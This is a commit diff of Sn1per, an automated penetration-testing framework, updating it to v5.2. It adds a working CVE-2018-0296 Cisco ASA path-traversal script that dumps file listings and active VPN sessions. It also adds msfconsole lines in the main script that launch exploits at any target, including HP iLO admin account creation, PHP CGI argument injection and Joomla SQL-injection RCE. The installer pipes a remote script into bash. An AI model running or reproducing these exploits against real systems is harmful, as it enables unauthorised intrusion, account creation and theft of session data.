mirror of https://github.com/1N3/Sn1per.git
Sn1per by 1N3@CrowdShield
This commit is contained in:
parent
50ffb503ea
commit
0e6a80ba14
32
CHANGELOG.md
32
CHANGELOG.md
|
|
@ -1,4 +1,36 @@
|
|||
## CHANGELOG:
|
||||
* v5.2 - Added SubOver subdomain takeover scanner
|
||||
* v5.2 - Added Subfinder subdomain enumeration tool
|
||||
* v5.2 - Added Amass subdomain enumeration tool
|
||||
* v5.2 - Added configurable modules/plugins to sniper script
|
||||
* v5.2 - Added MS17-010 SMB Etternal Blue MSF Exploit
|
||||
* v5.2 - Added MSF Postgresql login scanner
|
||||
* v5.2 - Added passive web spider
|
||||
* v5.2 - Added WebDav metasploit aux modules
|
||||
* v5.2 - Added NetBIOS NMap/MSF enumeration
|
||||
* v5.2 - Added SMB MSF enumeration
|
||||
* v5.2 - Added NSF MSF enumeration
|
||||
* v5.2 - Added SSH MSF enumeration
|
||||
* v5.2 - Added BadBlue Passthru MSF exploit
|
||||
* v5.2 - Added SMB GPP MSF aux module
|
||||
* v5.2 - Added Intel AMT MSF scanner
|
||||
* v5.2 - Added MySQL MSF scanner
|
||||
* v5.2 - Added MS03-026 DCOM RCE MSF exploit
|
||||
* v5.2 - Added VNC no auth MSF scanner
|
||||
* v5.2 - Added FTP MSF version scanner
|
||||
* v5.2 - Added FTP anonymous access MSF scanner
|
||||
* v5.2 - Added MS12-020 RDP MSF scanner
|
||||
* v5.2 - Added MS10-061 Spoolss MSF exploit
|
||||
* v5.2 - Added MS15-034 Sys Memory Dump MSF exploit
|
||||
* v5.2 - Added MS06-040 Netapi MSF exploit
|
||||
* v5.2 - Added MS05-039 PNP MSF exploit
|
||||
* v5.2 - Added MS12-020 Max Channels RDP scanner
|
||||
* v5.2 - Added JBoss status MSF scanner
|
||||
* v5.2 - Added Apache Struts 2 REST Plugin XStream RCE check
|
||||
* v5.2 - Added Apache Tomcat UTF8 Traversal MSF exploit
|
||||
* v5.2 - Added Apache OPTIONS Bleed MSF exploit
|
||||
* v5.2 - Added HP ILO Auth Bypass MSF exploit
|
||||
* v5.2 - Added Jooma Comfields SQL injection MSF exploit
|
||||
* v5.1 - Added dnscan to install.sh and updated sniper references which were broken
|
||||
* v5.1 - Changed default brute force list for dnscan to improve performance of scans
|
||||
* v5.1 - Removed CloudHunter and SubOver references (CC. 爱上平顶山)
|
||||
|
|
|
|||
|
|
@ -0,0 +1,61 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import urlparse
|
||||
import os
|
||||
|
||||
print("""
|
||||
_____ _____ _____ _____ _____ ___ _____ ___
|
||||
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
|
||||
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
|
||||
| | | | `--. \ | | | | | | _ | `--. \ _ |
|
||||
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
|
||||
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
|
||||
|
||||
______ _ _ _____ _
|
||||
| ___ \ | | | | |_ _| | |
|
||||
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
|
||||
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
|
||||
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
|
||||
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
|
||||
|
||||
CVE-2018-0296
|
||||
Script author: Yassine Aboukir(@yassineaboukir)
|
||||
""")
|
||||
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
|
||||
url = sys.argv[1]
|
||||
|
||||
dir_path = os.path.dirname(os.path.realpath(__file__))
|
||||
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
|
||||
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
|
||||
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
|
||||
logon = "/+CSCOE+/logon.html"
|
||||
|
||||
try:
|
||||
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(e)
|
||||
sys.exit(1)
|
||||
|
||||
if "webvpnLang" in is_cisco_asa.cookies:
|
||||
try:
|
||||
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
|
||||
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
|
||||
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
|
||||
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(e)
|
||||
sys.exit(1)
|
||||
|
||||
if str(filelist_r.status_code) == "200":
|
||||
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
|
||||
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
|
||||
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
|
||||
else: print("Not vulnerable!")
|
||||
else:
|
||||
print("This is not Cisco ASA! E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
|
||||
sys.exit(1)
|
||||
|
||||
|
|
@ -0,0 +1,2 @@
|
|||
import pdfkit
|
||||
pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf')
|
||||
|
|
@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo ""
|
||||
|
||||
INSTALL_DIR=/usr/share/sniper
|
||||
|
|
@ -37,7 +37,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
|
|||
cd $INSTALL_DIR
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
|
||||
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
|
||||
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq
|
||||
apt-get install waffit 2> /dev/null
|
||||
pip install dnspython colorama tldextract urllib3 ipaddress requests
|
||||
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
|
||||
|
|
@ -78,6 +78,10 @@ pip install -r $PLUGINS_DIR/dnscan/requirements.txt
|
|||
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
|
||||
unzip slurp.zip
|
||||
rm -f slurp.zip
|
||||
cd ~/go/bin/;go get github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
|
||||
cd ~/go/bin;go get -u github.com/caffix/amass;mv amass /usr/local/bin/
|
||||
cd ~/go/bin;go get github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
|
||||
cd $PLUGINS_DIR
|
||||
wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
|
||||
wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
|
||||
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
|
||||
|
|
|
|||
637
sniper
637
sniper
|
|
@ -1,9 +1,9 @@
|
|||
#!/bin/bash
|
||||
# + -- --=[Sn1per by 1N3@CrowdShield
|
||||
# + -- --=[http://crowdshield.com
|
||||
# + -- --=[http://xerosecurity.com
|
||||
#
|
||||
|
||||
VER="5.1"
|
||||
VER="5.2"
|
||||
BROWSER="firefox" # SET DEFAULT BROWSER
|
||||
INSTALL_DIR="/usr/share/sniper"
|
||||
PLUGINS_DIR="$INSTALL_DIR/plugins"
|
||||
|
|
@ -39,6 +39,17 @@ ENABLE_AUTO_UPDATES="1"
|
|||
REPORT="1"
|
||||
LOOT="1"
|
||||
|
||||
# PLUGINS
|
||||
SUBLIST3R="1"
|
||||
AMASS="1"
|
||||
SUBFINDER="1"
|
||||
DNSCAN="1"
|
||||
CRTSH="1"
|
||||
SUBOVER="1"
|
||||
CLOUDHUNTER="0"
|
||||
SSL="1"
|
||||
PASSIVE_SPIDER="1"
|
||||
|
||||
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
|
||||
|
||||
function help {
|
||||
|
|
@ -49,7 +60,7 @@ function help {
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo ""
|
||||
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
|
||||
echo ""
|
||||
echo ' [*] NORMAL MODE'
|
||||
|
|
@ -115,7 +126,7 @@ function logo {
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo ""
|
||||
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
|
||||
echo ""
|
||||
}
|
||||
|
|
@ -325,13 +336,15 @@ function loot {
|
|||
cat "$a" | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" > $LOOT_DIR/reports/$a.txt
|
||||
echo "$a" | aha > $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
cat "$a" | aha >> $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
|
||||
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
|
||||
done
|
||||
cd ..
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
|
||||
touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
|
||||
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
if [ -f $SNIPER_PRO ]; then
|
||||
|
|
@ -406,7 +419,7 @@ if [ "$MODE" = "discover" ]; then
|
|||
fi
|
||||
echo -e "$OKRED ____ /\\"
|
||||
echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\"
|
||||
echo -e "$OKRED https://crowdshield.com \ \\"
|
||||
echo -e "$OKRED https://xerosecurity.com \ \\"
|
||||
echo -e "$OKRED ___ / \\"
|
||||
echo -e "$OKRED \ \\"
|
||||
echo -e "$OKRED === > [ \\"
|
||||
|
|
@ -489,7 +502,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://crowdshield.com"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
|
|
@ -569,6 +582,12 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -576,6 +595,11 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -594,11 +618,78 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo ""
|
||||
python $CMSMAP -t http://$TARGET/wordpress/
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-$PORT.txt
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-$PORT.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET -p $PORT
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -692,7 +783,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://crowdshield.com"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
|
|
@ -760,12 +851,15 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
|
||||
sslscan --no-failed $TARGET
|
||||
echo ""
|
||||
if [ "$SSL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -779,6 +873,12 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -sV -T5 -Pn -p $PORT --script=http-vuln* $TARGET
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -786,10 +886,22 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET
|
||||
clusterd --ssl -i $TARGET -p $PORT
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -803,11 +915,85 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo ""
|
||||
python $CMSMAP -t https://$TARGET:$PORT/wordpress/
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-$PORT.txt
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-$PORT.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -921,7 +1107,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
||||
echo -e "$OKRED "
|
||||
echo -e "$OKRED ./\."
|
||||
|
|
@ -967,7 +1153,6 @@ if [ "$MODE" = "stealth" ]; then
|
|||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
then
|
||||
|
||||
if [ "$OSINT" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING OSINT INFO $RESET"
|
||||
|
|
@ -984,26 +1169,48 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
if [ "$SUBLIST3R" = "1" ]; then
|
||||
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$AMASS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
|
||||
